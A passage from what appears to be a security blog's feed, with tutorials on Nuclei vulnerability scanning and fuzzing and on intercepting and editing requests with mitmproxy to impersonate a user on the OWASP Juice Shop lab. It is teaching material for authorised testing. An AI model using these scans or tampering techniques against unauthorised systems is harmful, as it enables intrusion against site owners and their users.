[Nuclei v2.8.0 - Fuzz all the way!](https://blog.projectdiscovery.io/nuclei-fuzz-all-the-way/)

[Fuzzing for Unknown Vulnerabilities with Nuclei v3.2](https://blog.projectdiscovery.io/nuclei-fuzzing-for-unknown-vulnerabilities/)

[Challenge solutions · Pwning OWASP Juice Shop](https://help.owasp-juice.shop/appendix/solutions.html)</content:encoded><author>Ruben Santos</author></item><item><title>Harnessing the Power of Nuclei: A Guide to Advanced Vulnerability Scanning</title><link>https://www.kayssel.com/post/nuclei</link><guid isPermaLink="true">https://www.kayssel.com/post/nuclei</guid><description>Nuclei, a standout in cybersecurity, offers template-driven vulnerability scanning. Enhanced by community collaboration, it&apos;s crucial for proactive defense. For deeper insights, visit Project Discovery&apos;s guide to unlock Nuclei&apos;s full potential and stay ahead in cybersecurity.</description><pubDate>Sun, 07 Apr 2024 10:46:25 GMT</pubDate><content:encoded># Introduction

In the ever-evolving landscape of cybersecurity, vulnerability scanners stand out as critical tools for protecting our digital environments. Among these essential tools, Nuclei emerges as a leading solution, characterized by its innovative approach to vulnerability detection. This guide aims to highlight the key features and functionalities of Nuclei, offering a clear roadmap for leveraging its capabilities:

-   **The Evolution of Digital Threats**: As cybersecurity challenges become more complex, the need for advanced tools like Nuclei has never been more critical.
-   **Nuclei&apos;s Distinction**: Developed by ProjectDiscovery, Nuclei differentiates itself through a template-based, community-driven approach, enabling efficient and targeted vulnerability scans.
-   **Community-Curated Templates**: At the heart of Nuclei&apos;s success is its utilization of community-curated templates for detecting both known and &quot;unknown&quot; vulnerabilities, allowing for customizable and precise scans.
-   **Comprehensive Cybersecurity Solution**: This guide provides a step-by-step exploration of Nuclei, from initial setup and template understanding to conducting first scans and analyzing results.
-   **Advanced Features and Applications**: Delve into Nuclei&apos;s advanced features, such as managing long-running scans and exploring fuzzing templates, to maximize its utility in your cybersecurity toolkit.

Join us as we delve into how Nuclei not only addresses today&apos;s cybersecurity challenges but also equips us to face the threats of tomorrow. This journey through Nuclei&apos;s functionalities will ensure you are well-equipped to enhance your digital defenses and maintain a proactive stance in the digital realm.

# Methodology update

In this chapter, we will incorporate two critical enhancements to our methodology:

-   **Leveraging Vulnerability Scanners:** Utilize vulnerability scanners to identify bugs that have been previously discovered in other web applications. This approach ensures that known vulnerabilities are not overlooked in your security assessments.
-   **Identifying Novel Web Vulnerabilities:** Focus on the detection of new web vulnerabilities, specifically within GET request parameters, by employing fuzzing techniques. This proactive strategy aids in uncovering potential security flaws that have not yet been cataloged.

# What Are Vulnerability Scanners?

In the vast and ever-evolving landscape of cybersecurity, one tool stands out as indispensable for fortifying our digital defenses: the vulnerability scanner. At its core, a vulnerability scanner is a specialized software designed to probe computer systems, networks, or applications for security weaknesses. These sophisticated tools play a critical role in the preemptive identification of vulnerabilities, allowing organizations and individuals to patch potential security breaches before they can be exploited by malicious actors.

The genesis of vulnerability scanners traces back to the early days of network computing, born out of the necessity to protect burgeoning digital infrastructures from emerging threats. Over the years, these scanners have evolved from simple, command-line interfaces to complex systems equipped with graphical user interfaces (GUIs), real-time analytics, and integrations with other cybersecurity tools.

There are several types of vulnerability scanners, each serving a distinct purpose:

-   **Network-based scanners** focus on identifying vulnerabilities in networked devices and servers, scanning for open ports, and misconfigured firewalls.
-   **Web application scanners** delve into web applications to find security flaws like SQL injection and cross-site scripting vulnerabilities.
-   **Wireless scanners** are tailored to detect security issues within wireless networks, ensuring that Wi-Fi networks are secure and not prone to attacks.
-   **Database scanners** aim to uncover vulnerabilities within databases, a critical component given the sensitive information they often hold.

The significance of vulnerability scanners goes beyond merely listing potential security flaws; they offer detailed insights into the severity of these vulnerabilities and provide recommendations for remediation. This proactive approach to security is a cornerstone of modern cybersecurity strategies, enabling organizations to stay one step ahead of potential threats.

As we delve deeper into the age of digital transformation, the role of vulnerability scanners will only grow in importance. They are not just tools but sentinels on the walls of our digital fortresses, guarding against the ceaseless tide of cyber threats. In this ongoing battle for cyber safety, understanding and leveraging vulnerability scanners is not just advisable; it&apos;s imperative.

The importance of vulnerability scanners in our digital defense arsenal cannot be overstated. These tools scan our networks, systems, and applications, hunting for weaknesses that could be exploited by cyber adversaries. Among the myriad of options available in the cybersecurity landscape, one tool has risen to prominence for its unique approach and effectiveness: Nuclei.

# What is Nuclei?

[Nuclei](https://github.com/projectdiscovery/nuclei) stands at the forefront of vulnerability scanning technology, a testament to what can be achieved when innovation meets the pressing needs of cybersecurity. Developed by the visionary team at [ProjectDiscovery](https://github.com/projectdiscovery), Nuclei is not merely another entry in the catalog of vulnerability scanners. It is a purpose-built tool designed to revolutionize the way we approach vulnerability detection and analysis.

**Key Highlights of Nuclei:**

-   **Template-based Scans:** Nuclei distinguishes itself with its template-driven approach. This innovation allows users to conduct highly specific and customizable scans, focusing on the vulnerabilities that matter most to their organization’s security posture.
-   **Unmatched Speed and Efficiency:** In the fast-paced world of cybersecurity, where threats evolve by the second, Nuclei’s ability to perform rapid, yet thorough scans is invaluable. It ensures that organizations can stay ahead of potential vulnerabilities, safeguarding their digital assets more effectively.
-   **A Flourishing Community:** The strength of Nuclei lies not just in its technical capabilities, but also in the vibrant community that supports it. Security professionals from around the globe contribute to its ever-growing repository of templates, ensuring that Nuclei remains on the cutting edge of vulnerability detection.
-   **Seamless Integration:** Understanding the importance of interoperability in cybersecurity, Nuclei is designed to integrate effortlessly with existing security tools and workflows. This makes it an indispensable addition to any security team’s toolkit, enhancing their capabilities without disrupting established processes.

# Getting Started with Nuclei

Starting your adventure with Nuclei is straightforward, designed to empower both experienced and novice cybersecurity enthusiasts to bolster their defense mechanisms efficiently. This guide will walk you through the initial steps, focusing on program installation and the foundational concept of templates for vulnerability detection.

## Installation

Installing Nuclei is a hassle-free process, accommodating various platforms. There are two main avenues for installation:

-   **Using Go**: If you have Go installed on your system, Nuclei can be set up with a single command. This method ensures that you&apos;re always running the most current version of the software.

```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest

```

-   **Direct Download**: For those without Go, the latest [release of Nuclei](https://github.com/projectdiscovery/nuclei/releases) can be directly downloaded from its GitHub repository. This option provides flexibility for users across different operating setups.

Before proceeding with the installation, verify that your system meets the necessary prerequisites for the chosen method. For the latest installation instructions and to choose the best option for your needs, visit the official Nuclei GitHub page: [https://github.com/projectdiscovery/nuclei](https://github.com/projectdiscovery/nuclei).

## Understanding Nuclei Templates

At the core of Nuclei&apos;s efficiency in detecting vulnerabilities are its templates. These templates, written in YAML, serve as the blueprint for scanning, defining the specific conditions and patterns that Nuclei searches for in target applications.

-   **Template-Based Detection**: By utilizing a collection of predefined templates, Nuclei can swiftly identify known vulnerabilities across a wide range of systems and applications. This method significantly reduces the time and complexity involved in setting up detailed scans.
-   **Customization and Community Support**: The ability to understand and modify template structures allows for tailored vulnerability assessment. Additionally, the vibrant Nuclei community contributes to a growing repository of templates, ensuring the tool remains updated with the latest threat intelligence.

Exploring the template documentation available on Nuclei&apos;s GitHub or diving into the community-curated templates will equip you with the knowledge to effectively harness the power of Nuclei in your security audits.
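Although the full schema lives in the official docs, the anatomy is easy to sketch. The following is a hedged, minimal example in the spirit of the bundled technology-detection templates (the id, author, and matcher word here are illustrative, not an official template):

```yaml
id: example-ng-version-detect

info:
  name: Angular Detection (example)
  author: example-author
  severity: info

http:
  - method: GET
    path:
      - &quot;{{BaseURL}}&quot;
    matchers:
      - type: word
        part: body
        words:
          - &quot;ng-version&quot;

```

A template is therefore just declarative data: the engine issues the request and evaluates the matcher against the response.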

# Using Nuclei

In our journey through understanding vulnerability scanners, we&apos;ve tackled theoretical aspects and delved into some intricate details of Nuclei. Now, it&apos;s time to shift our focus towards practical applications, exploring essential use cases you&apos;ll want to remember.

Launching Nuclei with the &quot;-h&quot; option unveils a plethora of settings, which might initially seem daunting. However, fret not; while many options fine-tune the tool&apos;s behavior, we&apos;ll concentrate on the fundamental features that are crucial for getting started.

![](/content/images/2024/04/image.png)

Nuclei help command

Nuclei, a template-driven tool aimed at detecting previously identified vulnerabilities, benefits greatly from regular updates. To keep your toolkit sharp, use the update flag to refresh your templates, typically housed in the default directory:

```bash
~/nuclei-templates/

```
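Refreshing them is a single command (flag name per nuclei&apos;s help output; recent versions can also check for template updates automatically on launch):

```bash
nuclei -update-templates

```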

![](/content/images/2024/04/image-2.png)

Nuclei update

![](/content/images/2024/04/image-3.png)

Nuclei template directory

An example within this directory, such as:

```bash
~/nuclei-templates/http/technologies/angular-detect.yaml

```

demonstrates the wide range of templates available for software version detection. Take the Angular detection template: its syntax, while straightforward, is a prime example of how these templates identify specific attributes, in this case &quot;ng-version&quot;, within the responses from targeted URLs.

![](/content/images/2024/04/image-4.png)

Angular detection template in YAML format

If you inspect pages like juice-shop, you&apos;ll notice the &quot;ng-version&quot; attribute in action, demonstrating Angular&apos;s presence.

![](/content/images/2024/04/image-6.png)

Version of angular in the response

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    It is recommended to launch nuclei with --rate-limit to avoid overwhelming or taking down the target. In my case, I usually add &quot;--rate-limit 10&quot;.
  &lt;/div&gt;
&lt;/div&gt;

After running Nuclei, you should find a detailed output, categorizing vulnerabilities by their criticality, with many classified as informational.

```bash
nuclei -u &lt;url&gt;

```

![](/content/images/2024/04/image-5.png)

Nuclei execution

Nonetheless, you might find noteworthy findings, such as medium-risk application metrics or missing security headers—a different approach from what was discussed in our [second chapter](https://www.kayssel.com/post/hacking-web-2/).

![](/content/images/2024/04/image-7.png)

Application metrics

An intriguing observation might be the absence of Angular detection in your results. This occurs because Angular applications, as we&apos;ve learned, require browser simulation to fully reveal the content of their responses. This can be achieved by running Nuclei with the &quot;headless&quot; flag, a crucial step for a comprehensive initial scan.
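In practice, this means re-running the scan with the headless flag enabled (placeholder target as before):

```bash
nuclei -u &lt;url&gt; -headless --rate-limit 10

```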

![](/content/images/2024/04/image-9.png)

Headless execution

Nuclei offers numerous flags that tailor the scanning process to your needs, whether you&apos;re adjusting the level of output detail or controlling the volume of requests. Notable options include:

-   **--severity**: Filters templates by their severity level (info, low, medium, high, critical), enabling targeted testing based on vulnerability severity.
-   **--proxy**: Routes Nuclei&apos;s traffic through a specified proxy, useful for anonymizing scans, debugging, or scanning from specific locations. This flag supports HTTP, HTTPS, and SOCKS5 proxies.
-   **-tags**: Allows the use of one or more tags to refine template selection based on vulnerability type, issue, or targeted system. For instance, to focus on SQL injection vulnerabilities, you might use `-tags sqli`.
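Combining these flags gives a focused run. As a sketch (placeholder target; the flag values are illustrative):

```bash
nuclei -u &lt;url&gt; -severity medium,high,critical -tags sqli --rate-limit 10

```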

## Exploring Advanced Nuclei Templates for Fuzzing

In our discussions so far, we&apos;ve navigated through using Nuclei for detecting known vulnerabilities, invaluable for external penetration testing across numerous servers. However, when it comes to web application penetration testing, identifying application-specific vulnerabilities requires a different approach. This is where fuzzing templates come into play.

[GitHub - projectdiscovery/fuzzing-templates: Community curated list of nuclei templates for finding “unknown” security vulnerabilities.](https://github.com/projectdiscovery/fuzzing-templates)

To leverage these fuzzing templates effectively, we&apos;ll need to target GET requests at various endpoints with parameters. A practical way to gather such endpoints is through a proxy: by writing a plugin that logs URLs as you explore the application (if you are using [mitmproxy](https://www.kayssel.com/post/proxy/)), you can amass a significant list of potential targets.

```bash
mitmdump -s export_urls.py

```

```python
from mitmproxy import http

def request(flow: http.HTTPFlow) -&gt; None:
    # Open the file each time a request is captured
    with open(&quot;urls.txt&quot;, &quot;a&quot;) as file:
        # Write the captured request&apos;s URL to the file, followed by a newline
        file.write(flow.request.pretty_url + &quot;\n&quot;)

```

This method enables the accumulation of URLs while investigating an application. Additionally, tools like [Katana can be employed to directly collect parameters](https://www.kayssel.com/post/hacking-web-2/), offering a versatile approach to scanning application vulnerabilities.

```bash
katana -u &quot;&lt;url&gt;&quot; -f qurl -jc -headless -silent | nuclei 

```

After gathering a sufficient list of endpoints, filter those with parameters for fuzzing. If you haven&apos;t utilized Katana&apos;s one-liner, you can still prepare your list for fuzzing as follows:

```bash
cat urls.txt | grep &quot;192&quot; | grep &quot;?&quot; | grep -v &quot;socket&quot; | sort -u &gt; urls_to_fuzz.txt
nuclei -t fuzzing-templates/ -list urls_to_fuzz.txt -fuzz -headless


```
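If you prefer to keep this filtering step in Python (for example, alongside the mitmproxy tooling that captured the URLs), it can be sketched as a small helper; the function name is ours, and the host marker and &quot;socket&quot; exclusion mirror the grep pipeline above:

```python
def filter_fuzz_targets(urls, host_marker="192"):
    # Keep in-scope URLs that carry query parameters, drop websocket noise,
    # and deduplicate while preserving order (the grep / sort -u equivalent).
    seen = set()
    targets = []
    for url in urls:
        in_scope = host_marker in url and "?" in url and "socket" not in url
        if in_scope and url not in seen:
            seen.add(url)
            targets.append(url)
    return targets

```

Write the result to urls_to_fuzz.txt, one URL per line, and feed it to nuclei with -list exactly as above.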

![](/content/images/2024/04/image-10.png)

Fuzzing Execution

While initial runs may not yield results, this doesn&apos;t imply the absence of vulnerabilities such as SQL injection or DOM XSS. Running Nuclei through a proxy and analyzing the responses can reveal error messages indicative of vulnerabilities, such as SQLi errors, that current templates miss because they lack those specific error patterns.

```bash
nuclei -t fuzzing-templates/ -list urls_to_fuzz.txt -fuzz --rate-limit 10 -headless -proxy http://127.0.0.1:8888

```

![](/content/images/2024/04/image-13.png)

Response contains SQLite error

In cases where known errors aren&apos;t detected by existing templates, customizing templates to include these patterns can enhance detection capabilities.

```bash
lab/web_hacking/nuclei/fuzzing-templates/sql

```
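Extending those templates usually comes down to adding the missing error string to a matcher&apos;s word list. A hedged sketch of the relevant fragment (the exact strings depend on what the proxy showed you):

```yaml
matchers:
  - type: word
    part: body
    words:
      - &quot;SQLITE_ERROR&quot;
      - &quot;SQLite3::SQLException&quot;

```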

![](/content/images/2024/04/image-14.png)

SQLite errors currently included

![](/content/images/2024/04/image-11.png)

New error included

![](/content/images/2024/04/image-12.png)

Detection of vulnerability

As we progress, we&apos;ll delve deeper into the intricacies of the Nuclei template system, exploring how to craft a personalized vulnerability scanning engine that can identify a wider range of vulnerabilities, further enhancing our penetration testing toolkit.

&lt;div class=&quot;kg-callout-card kg-callout-card-blue&quot;&gt;
  &lt;div class=&quot;kg-callout-emoji&quot;&gt;💡&lt;/div&gt;
  &lt;div class=&quot;kg-callout-text&quot;&gt;
    This functionality has since been updated: the fuzzing templates are being merged into the default template set and can be used with the -dast flag.
  &lt;/div&gt;
&lt;/div&gt;

## Managing Long-Running Nuclei Scans with Save Points

In the realm of penetration testing, time is often of the essence. Nuclei, while powerful, can sometimes run lengthy scans that don&apos;t neatly fit into the tight schedules of a pentesting assignment. Recognizing this challenge, Nuclei incorporates a valuable feature designed to accommodate the dynamic pacing of penetration tests: the ability to save and resume scan progress.

When you&apos;re running a scan and need to pause—for instance, due to time constraints or the need to reallocate resources—simply interrupt the scan with Ctrl+C. This action triggers Nuclei to automatically generate a save file. This save file is crucial as it meticulously records the scan&apos;s current state, ensuring no progress is lost.

![](/content/images/2024/04/image-15.png)

Stop the execution

The beauty of this functionality lies in its simplicity and the flexibility it offers to penetration testers. When you&apos;re ready to resume the scan, you can use this save file to pick up exactly where you left off, ensuring a seamless continuation of your testing activities without the need to start from scratch.
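Resuming is then a matter of pointing nuclei at that file with the resume flag (the path below is illustrative; use the one nuclei printed when you interrupted it):

```bash
nuclei -resume /path/to/resume-file.cfg

```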

![](/content/images/2024/04/image-16.png)

Execution from save point

# Conclusions

In conclusion, Nuclei emerges as a pivotal tool in the cybersecurity landscape, offering a comprehensive, template-driven approach to vulnerability scanning. This guide highlights Nuclei&apos;s unique position, underpinned by community-driven innovation and its capability to meet the nuanced demands of modern cybersecurity. As we delve into its functionalities, from basic installations to leveraging advanced features like fuzzing templates and managing long scans, it&apos;s evident that Nuclei is more than just a tool; it&apos;s an integral part of a proactive defense strategy against the ever-evolving cyber threats.

For those keen on deepening their understanding of Nuclei and maximizing its potential, [the Project Discovery guide](https://docs.projectdiscovery.io/tools/nuclei/overview) serves as an invaluable resource. It not only provides detailed instructions and insights into the tool&apos;s extensive capabilities but also connects users with a community of cybersecurity professionals dedicated to refining and expanding Nuclei&apos;s applications. Visiting the Project Discovery guide will equip you with the knowledge and skills to harness Nuclei&apos;s full power, ensuring your digital environments are fortified against the challenges of tomorrow.

As we conclude, the importance of tools like Nuclei in safeguarding our digital frontiers cannot be overstated. In the ongoing battle for cybersecurity, knowledge and preparedness are key. Nuclei, with its innovative approach and the support of a vibrant community, offers a beacon of hope, showcasing the potential of collaborative efforts in overcoming the cyber threats of the digital age.</content:encoded><author>Ruben Santos</author></item><item><title>From Novice to Ninja: Proxy Techniques in Pentesting</title><link>https://www.kayssel.com/post/proxy</link><guid isPermaLink="true">https://www.kayssel.com/post/proxy</guid><description>Embark on a voyage through proxy-powered web penetration testing. From configuring mitmproxy to uncovering vulnerabilities in real-world applications, discover the tools and tactics essential for navigating the ever-evolving cybersecurity landscape.</description><pubDate>Sun, 24 Mar 2024 16:54:59 GMT</pubDate><content:encoded># Introduction: Navigating the Web Penetration Testing Seas

Welcome aboard, digital explorers! You&apos;re about to embark on an extraordinary voyage through the treacherous yet thrilling waters of web penetration testing. In this realm, proxies are more than mere tools; they are our compass and map, guiding us through the murky depths of web applications to uncover hidden treasures and lurking dangers alike.

Proxies, the unsung heroes of the cybersecurity world, offer us a unique vantage point from which to observe, intercept, and manipulate the data flowing between our browsers and the vast expanse of the internet. They are the linchpins in our quest to fortify our digital fortresses against the relentless onslaught of cyber threats.

In this chapter, we&apos;ll be charting a course through the intricate network of proxies, with a special focus on mitmproxy, a versatile and powerful ally in our penetration testing arsenal. Whether you&apos;re a seasoned sailor of the cyber seas or setting foot on the deck for the first time, you&apos;ll find valuable insights and strategies to enhance your web security endeavors.

## Setting Sail with Proxies

Our journey begins with an exploration of the diverse species of proxies that inhabit the digital ocean. From the shadowy realms of Anonymous Proxies to the bustling trade routes guarded by Reverse Proxies, we&apos;ll navigate the complexities of these vital tools. Understanding their unique characteristics and applications will equip us with the knowledge to choose the right proxy for each mission.

## Arming Ourselves for Adventure

With our bearings set, we&apos;ll delve into the arsenal of tools at our disposal, with a spotlight on mitmproxy. This lightweight yet formidable tool will be our primary instrument in dissecting and defending web applications. Through hands-on guidance and practical examples, we&apos;ll master the art of using mitmproxy to unveil vulnerabilities and safeguard our digital domains.

## The Craft of Configuration

Before diving into the action, we&apos;ll lay the groundwork by configuring our environment. Setting up mitmproxy and integrating it with our browsers and systems is akin to tuning our instruments before a concert—a step essential for the symphony of security testing to proceed harmoniously.

As we sail towards the horizon, we&apos;ll engage in real-world scenarios, employing our proxy to intercept, examine, and manipulate web traffic. From the bustling marketplaces of OWASP Juice Shop to the hidden coves of custom applications, we&apos;ll apply our skills in live environments, bridging the gap between theory and practice.

## Enriching Our Voyage with Scripts

Our adventure is further enhanced by the magic of scripts, extending mitmproxy&apos;s capabilities to suit our every need. Whether it&apos;s exporting requests for further analysis or automating sophisticated attack sequences, we&apos;ll discover how to tailor our toolkit to become the ultimate web penetration testing craftsman.

As we chart this course together, our journey will be illuminated by the twin stars of curiosity and diligence. With each challenge conquered and mystery unraveled, we&apos;ll grow not just as testers but as guardians of the digital realm.

So, fasten your seatbelts and prepare your tools—our voyage into the world of web penetration testing and proxies is about to begin. The seas may be rough and the challenges daunting, but the rewards of securing our digital horizons are unparalleled. Welcome to the adventure of a lifetime.

# Types of Proxies

In the vast ocean of proxies, there are several species, each adapted to its unique environment. Let&apos;s meet some of the most common ones:

-   **Anonymous Proxies**: The ninjas of the proxy world. They hide your IP address, making your online activities invisible to prying eyes. Perfect for testers who need to operate without leaving a trace.
-   **Transparent Proxies**: These guys don&apos;t hide your IP address but still forward your requests. They&apos;re like the honest workers of the internet, often used for caching web pages and controlling employee internet usage.
-   **Reverse Proxies**: The gatekeepers. They sit in front of web servers, directing incoming traffic to the correct destination. They&apos;re great for balancing loads and providing additional security layers.
-   **HTTP vs. SOCKS Proxies**: The classic debate. HTTP proxies understand and interpret web traffic, making them ideal for viewing and modifying web pages. SOCKS proxies, on the other hand, are like the versatile adventurers—they handle all types of traffic, not just web pages, making them a go-to for testers working with various applications.

Each type of proxy has its stage and script in the theater of web penetration testing. Choosing the right proxy is like selecting the right tool for a job—it can make all the difference in how effectively you can test and secure a web application.
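The HTTP vs. SOCKS distinction is easy to see with curl, which supports both (local addresses and ports here are illustrative):

```bash
# HTTP proxy: the client speaks to the proxy at the HTTP layer
curl -x http://127.0.0.1:8888 http://example.com/

# SOCKS5 proxy: arbitrary TCP traffic is tunneled, not just web requests
curl --socks5 127.0.0.1:1080 http://example.com/

```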

# Setting Up and Tooling Up for Success

Now that we&apos;ve navigated the waters of proxy types, it&apos;s time to gear up and get our hands dirty. Setting up a proxy for web penetration testing might sound like rocket science, but fear not! It&apos;s more like assembling a high-tech LEGO set. Let&apos;s talk about the toolkit that&apos;s going to make you the master builder of web security.

## Burp Suite

First up is the legendary Burp Suite, a favorite among web security professionals. Think of it as your digital Swiss Army knife, equipped with everything from basic mapping to advanced vulnerability exploitation tools. It&apos;s like having a superhero sidekick, ready to leap into action, whether you&apos;re just getting started or diving deep into the vulnerabilities of a web application.

## OWASP ZAP

Next, we have OWASP ZAP (Zed Attack Proxy), the open-source wonder. It&apos;s the Robin to your Batman, offering a powerful range of tools to detect vulnerabilities in web applications. With its user-friendly interface and community-backed support, ZAP makes sure you&apos;re well-equipped to tackle security threats head-on.

## Mitmproxy

Last but definitely not least, meet mitmproxy, the tool we&apos;ll be getting up close and personal with throughout our series. This lightweight proxy is like the agile spy of the internet, capable of intercepting, inspecting, modifying, and replaying web traffic. Its console interface might remind you of piloting a spaceship with text commands, but once you get the hang of it, you&apos;ll be maneuvering through web traffic like a pro. We&apos;re going to spend a lot of time with mitmproxy, uncovering the secrets of web applications and learning how to shield them from potential threats. So buckle up, it&apos;s going to be an exciting ride!

### Setting the Stage

Before we jump into action, let&apos;s set the stage. Configuring your proxy involves a few key steps: installing the software, setting your browser to route traffic through the proxy, and ensuring your proxy is listening to the right port. It&apos;s like tuning your musical instrument before a concert; everything needs to be pitch-perfect for the performance ahead.

In this case, I am going to show you how to do it with mitmproxy, but if you are using another proxy such as Burp, the steps are very similar: in the end, you just need to create a trusted certificate and install it in your favorite browser.

Anyway, the different steps can be found in the official documentation:

[Certificates](https://docs.mitmproxy.org/stable/concepts-certificates/)

First off, we need to configure FoxyProxy in our browser to forward traffic through the right port. I’ve chosen port 8888 for this demonstration. This step tells FoxyProxy where to direct the web traffic for our investigative purposes.

![](/content/images/2024/03/image-37.png)

Foxyproxy configuration

With FoxyProxy configured, it’s time to bring mitmproxy into play. Open your terminal and enter the magic incantation:

```bash
mitmproxy -p 8888

```

This command starts mitmproxy and tells it to keep an eye on port 8888, our chosen gateway to the web&apos;s hidden secrets.

Navigate to &quot;mitm.it&quot; using the browser where you’ve set up FoxyProxy. Here, you&apos;ll be greeted by a dashboard offering various certificates. Download the one for Linux (or your respective operating system). Next up, we’re heading to browser settings to make it trust our new friend, the mitmproxy certificate.

![](/content/images/2024/03/image-29.png)

mitm.it domain

Installing the Certificate in Firefox (Chrome users, your journey is similar):

-   Open Firefox settings and head over to the ‘View Certificates’ section.
-   Click on ‘Import’ and follow the prompts, ticking all the right boxes to secure Firefox’s trust in our certificate.

![](/content/images/2024/03/image-32.png)

View Firefox certificates

![](/content/images/2024/03/image-33.png)

Import certificates

With the certificate installed, visiting the OWASP Juice Shop (or any web application you&apos;re testing) should unveil all its web traffic in mitmproxy&apos;s console, like lifting the curtain on a stage.

![](/content/images/2024/03/image-28.png)

Panel with all requests

To streamline your web testing adventures, consider creating a configuration file for mitmproxy. This little cheat sheet automatically sets your preferred settings, like the port number and any specific scripts you want to run (we’ll dive into the power of scripts later).

![](/content/images/2024/03/image-36.png)

Configuration file
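As a hedged example, a minimal ~/.mitmproxy/config.yaml might look like this (option names per the mitmproxy docs; the script path is illustrative):

```yaml
listen_port: 8888
scripts:
  - requests_dumper.py

```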

Here’s a pro tip: Take a moment to explore mitmproxy’s tutorials. They’re like a treasure map to mastering this tool, guiding you through basic to advanced maneuvers. And don’t worry if you see a lot of Vim-style shortcuts; if you’ve ventured through the realms of Vim before, you’ll feel right at home.

[User Interface](https://docs.mitmproxy.org/stable/mitmproxytutorial-userinterface/)

### Why mitmproxy?

You might wonder why we&apos;re spotlighting mitmproxy in our series. It&apos;s simple: mitmproxy offers a blend of simplicity, power, and flexibility unmatched by many other tools. Whether you&apos;re a rookie or a seasoned pro, mitmproxy scales with your skills, offering deep insights into web traffic and vulnerabilities. Plus, its open-source nature means you&apos;re joining a community of experts dedicated to making the web a safer place.

# Practical Use Cases in Penetration Testing

Entering the heart of our adventure, it&apos;s time to explore the real-world application of proxies in web penetration testing. Armed with our tools, especially mitmproxy, we&apos;re ready to tackle the challenges that lie ahead. In this section, we&apos;ll outline various scenarios where proxies become the linchpin of our testing strategy, demonstrating their value in uncovering and exploiting vulnerabilities in web applications.

## Interception and Modification of Requests and Responses

One of the core strengths of using proxies like mitmproxy is the ability to intercept and modify HTTP/HTTPS requests and responses in real-time. This capability allows us to:

-   **Inspect Headers and Cookies**: By examining the headers and cookies, we can uncover security flaws such as insecure settings or vulnerable tokens.
-   **Manipulate Data**: Altering inputs and outputs enables us to test the application&apos;s handling of unexpected or malicious data, identifying potential input validation and sanitization issues.

## Analyzing Encrypted Traffic

With the majority of web applications using HTTPS for security, it&apos;s crucial to be able to analyze encrypted traffic. Proxies allow us to decrypt and inspect this traffic, which is essential for:

-   **Identifying Sensitive Data Exposure**: Revealing how an application encrypts and transmits sensitive information can highlight potential data leakage points.
-   **Testing SSL/TLS Configuration**: Ensuring that the application&apos;s encryption settings are up to snuff and not vulnerable to attacks like SSL stripping or vulnerable cipher suites.

## Automating Custom Attacks

Proxies not only let us perform manual testing but also automate custom attacks. This is particularly useful for:

-   **Replaying and Customizing Attacks**: Once we identify a request that leads to a vulnerability, we can replay it with modifications to explore the depth and impact of the issue.
-   **Crafting Sophisticated Attack Sequences**: By automating attacks, we can simulate complex attack sequences that would be time-consuming or difficult to perform manually.

## Identifying Logic Flaws and Session Management Issues

Logic flaws and session management vulnerabilities can be subtle and hard to detect. Using proxies, testers can:

-   **Session Hijacking and Fixation**: Intercepting and modifying session tokens can reveal vulnerabilities in how sessions are managed and protected.
-   **Testing Access Controls**: By modifying user roles or permissions in requests, we can test the effectiveness of access control mechanisms.

# Real-World Application: Juice Shop

Let&apos;s dive into the practical arena with our case study, the Juice Shop. This section will walk you through how I leveraged proxies, specifically mitmproxy, to unearth vulnerabilities and perform tests that echo real-world scenarios. Through hands-on examples from Juice Shop, we&apos;ll see the pivotal role proxies play in bridging theory with the gritty reality of web security.

One fascinating experiment to conduct with an application like Juice Shop involves exploring whether a user can leave comments while masquerading as another user. This test shines a light on how the application manages comment functionalities and the potential loopholes therein.

## Setting Up the Stage

First things first, let’s get our proxy, mitmproxy, into interception mode. Depending on where your testing environment is hosted, you&apos;ll adjust the viewing filter accordingly. For those working with a remote setup, you might use a command similar to:

```bash
set view_filter &apos;192.168.20.120&apos;

```

![](/content/images/2024/03/image-35.png)

Filter by target IP

If you’re tinkering directly on your local machine, `localhost` will be your target.

## The Test Run

With mitmproxy lying in wait, let&apos;s initiate a comment post to understand the mechanics behind it. Intercepting the request unveils that both the author&apos;s name and the message content are neatly packed in the request body, ripe for modification.

![](/content/images/2024/03/image-48.png)

Functionality to post comments

![](/content/images/2024/03/image-43.png)

Intercepted requests

To edit the request, a simple dance of pressing &quot;e&quot; for edit and &quot;a&quot; for accessing the request body gets us to the editor set by your `$EDITOR` environment variable. Here, in my playground, I decided to switch the author name to impersonate another user.

![](/content/images/2024/03/image-44.png)

Message modified and ready to send

After tweaking the request to our liking and pressing &quot;a&quot; to send it off, mitmproxy confirms our mischief has been successfully executed by showing the altered comment now attributed to a different user.

![](/content/images/2024/03/image-45.png)

Successful response

## Watching the Dominoes Fall

&lt;details&gt;
&lt;summary&gt;To wrap up our little experiment:&lt;/summary&gt;

```bash
set view_filter &apos;&apos;

```
&lt;/details&gt;


Clearing the view filter allows us to witness the outcome in the product reviews section—our comment, now falsely attributed to another user, standing as a testament to the discovered vulnerability.

![](/content/images/2024/03/image-47.png)

Commented by impersonating another user

## The Takeaway

This scenario offers just a glimpse into the utility of proxies in a security audit. By scrutinizing feature behaviors and toying with parameters, we can uncover oversights not immediately apparent or reachable by automated scanners like Burp Suite or Nuclei. The nuanced vulnerabilities we manually unravel through proxies can be both challenging and rewarding, underlining the importance of mastering this tool in your security toolkit.

# Enhancing mitmproxy with Scripts

One of the most exhilarating aspects of mitmproxy lies in its versatility, thanks to its plugin system. This feature is a game-changer, enabling you to tailor the tool to your heart&apos;s desire. Consider this: with just a few lines of code, you can forge a command named &quot;exporter&quot; that sieves through your marked requests, exporting them in their raw glory to a specified directory.

### The Exporter Plugin

```python
from mitmproxy import ctx, http
from mitmproxy import command, types, flow
import os

class Exporter:
    EXPORT_DIR = os.getcwd() + &quot;/raw_requests&quot;

    def format_request(self, flow: http.HTTPFlow) -&gt; str:
        request_line = f&quot;{flow.request.method} {flow.request.pretty_url} {flow.request.http_version}&quot;
        headers = &apos;\n&apos;.join(f&quot;{name}: {value}&quot; for name, value in flow.request.headers.items())
        body = flow.request.get_text(strict=False)
        return f&quot;{request_line}\n{headers}\n\n{body}&quot;

    @command.command(&quot;exporter.export_marked&quot;)
    def export_marked(self, flows: types.Sequence[flow.Flow], dir: str = EXPORT_DIR) -&gt; None:
        if not os.path.exists(dir):
            os.makedirs(dir)
        # Use a short local name to avoid shadowing the imported &quot;flow&quot; module
        for f in flows:
            if f.marked:
